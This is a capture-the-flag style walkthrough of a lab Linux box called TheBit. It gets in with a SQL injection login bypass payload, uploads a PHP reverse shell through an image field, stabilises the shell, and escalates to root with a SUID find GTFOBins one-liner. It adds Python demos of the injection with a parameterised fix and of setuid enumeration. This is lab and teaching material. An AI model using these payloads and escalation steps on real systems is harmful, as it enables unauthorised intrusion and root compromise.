TheBit
ip = 10.150.150.146
os = linux
nmap scan
From the nmap scan we can see 5 open ports, so let's start enumeration with port 80. Browsing to the web page gives this:
Clicking the Get Started button led to a login page.
Default credentials didn't work. Since the server is also running MySQL, let's try SQL injection with a classic auth-bypass payload. The injectable field is the password, so any username works as long as the payload goes in the password field (the same string also works as the username):
' or ''='
This gave me admin access.
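Why that payload logs you in: the login query is built by string concatenation, so the quote in the password closes the literal and the trailing `or ''='` adds a condition that is true for every row. The script below is an added example, not code from the box or the write-up; it uses an in-memory SQLite table with a hypothetical users schema (the real table and column names were never shown) to contrast the vulnerable query with the parameterised fix.

```python
import sqlite3

# Constructed stand-in for the target's MySQL users table (hypothetical schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cr3t-not-guessable", "admin"), ("alice", "alicepw", "user")],
    )
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The bug: user input is pasted straight into the SQL text.
    return (
        "SELECT username, role FROM users WHERE username='%s' AND password='%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    # With password = ' or ''=' the WHERE clause becomes
    #   username='x' AND password='' or ''=''
    # AND binds tighter than OR, so this is (false) OR (true): every row matches
    # and the first one (admin) is returned.
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_safe(conn, username, password):
    # Fix: bound parameters. The payload is compared as data, never parsed as SQL.
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "' or ''='"
    print(build_vulnerable_query("whatever", payload))
    print("vulnerable:", login_vulnerable(db, "whatever", payload))
    print("safe:      ", login_safe(db, "whatever", payload))
```

The vulnerable login returns the admin row for any username; the parameterised one returns nothing for the same input. Real applications should additionally store password hashes rather than compare plaintext, but the injection is the point here.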
We found FLAG3 on the dashboard.
Next, let's try to upload a reverse shell.
Go to the Test Bank page, click Add Question, upload a PHP reverse shell in the image field and save.
Start a netcat listener for the reverse connection, then open the Test Bank page again; rendering the uploaded "image" executes the PHP and spawns a shell.
Stabilize the shell: run python -c "import pty;pty.spawn('/bin/bash')" (use python3 if python is not present),
then export TERM=xterm,
press Ctrl+Z to background the shell,
and on your own terminal run stty raw -echo; fg to bring it back as a fully interactive TTY.
BOOM! We are in, so let's grab the user flag.
privilege escalation
Enumerate binaries with the SUID bit set using
find / -perm -u=s -type f 2>/dev/null
The find binary itself has the SUID bit set, so we can use it to escalate to root. GTFOBins gives the command for find:
find . -exec /bin/sh -p \; -quit
The -p flag keeps the effective uid (root) instead of letting the shell drop back to our own uid. And we are root.
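The SUID enumeration above is worth automating when a box has dozens of setuid files, most of them the usual suspects (passwd, sudo, su, mount). The script below is an added example, not part of the write-up; it walks the filesystem the same way the find one-liner does and sorts each hit into "known GTFOBins escalation", "normal system binary" or "worth a look". The two name lists are assumptions (a small, illustrative subset of GTFOBins and of typical distro SUID binaries), not authoritative.

```python
import os
import stat
import tempfile

# Assumed, illustrative subsets; extend from GTFOBins for real use.
KNOWN_GTFOBINS = {"find", "vim", "bash", "python", "python3", "perl",
                  "nmap", "env", "cp", "mv", "less", "more", "awk"}
USUAL_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn",
              "gpasswd", "newgrp", "pkexec", "ping", "fusermount"}


def find_setuid_files(root="/", skip=("/proc", "/sys", "/dev")):
    """Return regular files under root with the setuid bit set (like find -perm -u=s -type f)."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(skip):
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # permission denied etc. == 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def triage(paths):
    """Label each setuid path by how interesting it is for privilege escalation."""
    out = []
    for p in paths:
        name = os.path.basename(p)
        if name in KNOWN_GTFOBINS:
            label = "gtfobins"
        elif name in USUAL_SUID:
            label = "usual"
        else:
            label = "check"
        out.append((p, label))
    return out


def demo():
    """Constructed scratch directory: one fake setuid 'find', one plain file.
    Returns (setuid basenames, triage labels by basename)."""
    d = tempfile.mkdtemp()
    suid_path = os.path.join(d, "find")
    plain_path = os.path.join(d, "plain")
    for p in (suid_path, plain_path):
        open(p, "w").close()
    os.chmod(suid_path, 0o4755)   # owner may set the setuid bit on their own file
    os.chmod(plain_path, 0o755)
    hits = find_setuid_files(d)
    return ([os.path.basename(h) for h in hits],
            [(os.path.basename(p), label) for p, label in triage(hits)])


if __name__ == "__main__":
    for path, label in triage(find_setuid_files("/")):
        print(f"{label:9} {path}")
```

Run as a low-privileged user on the target; anything labelled gtfobins is the first thing to try, and anything labelled check is a custom or unusual binary that deserves a closer look before falling back to the usual suspects.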
Thanks.